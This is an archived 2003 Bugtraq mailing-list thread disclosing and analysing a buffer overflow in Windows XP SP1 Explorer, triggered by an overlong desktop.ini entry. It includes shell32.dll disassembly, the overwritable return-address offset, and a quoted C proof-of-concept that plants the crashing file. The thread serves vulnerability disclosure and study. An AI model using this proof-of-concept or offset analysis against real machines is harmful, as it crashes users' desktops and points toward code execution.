Detailed analysis: Buffer overflow in Explorer.exe on Windows XP SP1

• Previous message: Liu Die Yu: "fake location bar"
• Next in thread: nesumin: "Re: Detailed analysis: Buffer overflow in Explorer.exe on Windows XP SP1"
• Reply: nesumin: "Re: Detailed analysis: Buffer overflow in Explorer.exe on Windows XP SP1"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: <bugtraq@securityfocus.com>
Date: Sun, 11 May 2003 03:28:54 -0500

Hi, there:

We were able to duplicate what was reported by Kristopher Matthews and aT4r
InsaN3. Actually, if you have the following test scenario:

File/Dir Explanation
C:\
C:\temp\desktop.ini Overflowing text file
C:\test directory

The c:\temp\desktop.ini is the buffer-overflowing text file. Then, it
crashes not only Explorer.exe, but also Internet Explorer.exe, and
application programs (it crashed UltraEdit) that use file-open dialog box
trying to scan the c:\ hard drive. However, you can do the following safely
from a DOS prompt for the directory c:\test

Explorer c:\test

Of course, you cannot browse C:\test from the Explorer.exe GUI starting with
C:\ root directory because of the overflowing c:\temp\desktop.ini file.
Actually, I assume the overflowing file, no matter where it is located in
the subdirectory, will crash the Explorer.exe starting with any directory
higher above the overflowing desktop.ini file. (did not fully test though).

Down to the assembly level, this bug lies in the shell32.dll file as such:

7740F3C3 lea eax, [ebp-21Ch] ; full path to the
filename \desktop.in
7740F3C9 push eax
7740F3CA push 800h ; should be 400h I believe
7740F3CF lea eax, [ebp-0A1Ch]
7740F3D5 push eax
7740F3D6 push offset a_shellclassinf ; ".ShellClassInfo"
7740F3DB call ds:GetPrivateProfileSectionW

When GetPrivateProfileSectionW is called, it assumes the buffer to be as
large as two times of 800h. As you can see, the local buffer is only A1C -
21C = 800H for this string. So, it overflows if the desktop.ini contains a
long string. MSDN documents the third parameter for GetPrivateProfileSection
as such:

nSize
Specifies the size, in characters, of the buffer pointed to by the
lpReturnedString parameter.

To be precise, the buffer overflowing structure for this bug is such:

| --------------------- A1C ---------| EBP | RET | -----------------> higher
address

The replaceable RET address is located at (A1C+4)/2 = 510.

Due to the size limitation set by the 800H as well as the fact that the
overflowing string is converted to Unicode, the chance for executing a
malicious code (Unicode exploit code as well as exploitable RET address) is
very limited. That is the reason we are documenting it in details here.

We do not know how this bug affects shell32.dll files on other Windows
versions.

With due credits to those who wrote the emails quoted below.

Peter Huang
http://members.rogers.com/exurity/

-----Original Message-----
From: Kristopher Matthews [mailto:krism@mailsnare.net]
Sent: Friday, May 09, 2003 11:43 AM
To: 'Ryan Yagatich'
Cc: vuln-dev@securityfocus.com
Subject: RE: Buffer overflow in Explorer.exe

I have tested and duplicated this behavior on a fully patched/updated
Windows XP Pro system.

1. The overflow is for that particular key, AFAICT.
1a. It will not work for the root (c:/) directory; explorer.exe does not
parse 'desktop.ini' for that directory. It will, however, work for any other
directory.
2. It crashes explorer.exe (which runs the task bar/start menu, etc) - It
looks for all the world like a standard buffer overflow; I believe a more
carefully crafted 'desktop.ini' file could be cause for explorer.exe to
unintentionally execute arbitrary code.
3. Download and execute untrusted code? Combine this with any of the other
popular expoloits for windows; also, it wouldn't be terribly hard to get a
user to download a 'desktop.ini' file to their "My Documents" directory (in
the guise, of, say, a folder them, which windows does support; e.g.
different background, file layout, etc); bam, whenever they open that
directory, explorer crashes.

Regards,
Kristopher

-----Original Message-----
From: Ryan Yagatich [mailto:ryany@pantek.com]
Sent: Thursday, May 08, 2003 6:28 PM
To: at4r@3wdesign.es
Cc: vuln-dev@securityfocus.com

Hi,
        I don't quite understand the purpose behind this code. It creates
a read only file '/aT4r[at]3WDesign.es Security/desktop.ini' with the
contents of

[.ShellClassInfo]
AAAAAAAAAAAA {x2301}

        And then terminates? I don't have a windows machine available to
really explore this any, but what makes that entry in desktop.ini cause
this? Furthermore, is this issue only for that particular key or is it
generally just key/excessive parameter/missing value size that is
affected? And additionally, you mention that explorer will no longer be
able to operate when trying to browse the hard disk, but does this mean
globally, or when they try to browse the c:/ drive, or just that
particular folder?
        Please send me more information about this, (even if it references
past posts that I have missed) so that I can better understand the
severity of this. Espcially since to me, I still see it as someone needing
to download and execute untrusted software which causes a system crash,
and if that were going to happen there are far worse things that can be
done besides creating a small text file.

Thanks,
Ryan Yagatich

,_____________________________________________________,
\ Ryan Yagatich support@pantek.com \
/ Pantek Incorporated (877) LINUX-FIX /
\ http://www.pantek.com/security (440) 519-1802 \
/ Are your networks secure? Are you certain? /
\___E8354282324E636DB5FF7B8A6EDED51FD02C06C68D3DB695___\

On Wed, 7 May 2003, aT4r InsaN3 wrote:

>This bug allow a malicious an attacker to execute data with privileges of a

>user that is browsing the hard disk with explorer.
>
>tested against winxp SP1
>
>example code provided.
>
<snip>
>
> strcpy(path,"\\aT4r[at]3WDesign.es Security");
> mkdir(path);
> SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
>
> strcat(path,"\\desktop.ini");

> bof=fopen(path,"w");
> fputs("[.ShellClassInfo]\n",bof);
> memset(evil,'A',BUFF);
> fputs(evil,bof);
> fclose(bof);
<snip>

-----Original Message-----
From: aT4r InsaN3 [mailto:at4r@hotmail.com]
Sent: Wednesday, May 07, 2003 3:54 PM
To: vuln-dev@securityfocus.com
Subject: Buffer overflow in Explorer.exe

This bug allow a malicious an attacker to execute data with privileges of a
user that is browsing the hard disk with explorer.

tested against winxp SP1

example code provided.

/*

        Buffer Overflow in explorer.exe - Proof of Concept
        Tested only against: Windows XP SP1

        Found by aT4r@3wdesign.es

        Saludos a:
        - #Haxorcitos@efnet= { "Tarako", "Croulder", "Drakar" , "[back]",
"tyr" }:
        - #localhost and #darknet

        Usage: just execute this file.
                This code will crash your explorer every time you try to
browse your
harddisk
                execute this program again to delete the evil file ;-)

        (3ec.464): Access violation - code c0000005 (first chance)
        First chance exceptions are reported before any exception handling.
        This exception may be expected and handled.
        eax=00410041 ebx=0012aca8 ecx=77e5e1c4 edx=002f0000 esi=00121b70
edi=000ece90
        eip=00410041 esp=0177dfb0 ebp=00410041 iopl=0 nv up ei pl zr
na po
nc
        cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00010246
        00410041 ?? ???

        3W Design Security 2003. http://www.3WDesign.es/
*/

#include <direct.h>
#include <stdio.h>
#include <windows.h>
#include <sys/stat.h>

#define BUFF 2300
void main(){

        char path[256];
        char evil[BUFF+1]="";
        FILE *bof;
        struct stat st;
        printf("\n . .. ...: \tBuffer overflow in explorer.exe\t\t:... ..
.\n . ..
...: \tProof of Concept (aT4r@3wdesign.es)\t:... .. .\n\n");
        strcpy(path,"\\aT4r[at]3WDesign.es Security");
        mkdir(path);
        SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);

        strcat(path,"\\desktop.ini");
        if (stat(path,&st)==0)
                { remove(path); exit(1);}//just execute this program twice
to remote this
file :P
        bof=fopen(path,"w");
        fputs("[.ShellClassInfo]\n",bof);
        memset(evil,'A',BUFF);
        fputs(evil,bof);
        fclose(bof);
        printf("evil file: %s Created. Try to browse your Harddisk
O:-)\n",path);

}

_________________________________________________________________
Hipotecas para todos los bolsillos con MSN Money.
http://money.msn.es/hipotecas/default.asp

• Previous message: Liu Die Yu: "fake location bar"
• Next in thread: nesumin: "Re: Detailed analysis: Buffer overflow in Explorer.exe on Windows XP SP1"
• Reply: nesumin: "Re: Detailed analysis: Buffer overflow in Explorer.exe on Windows XP SP1"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]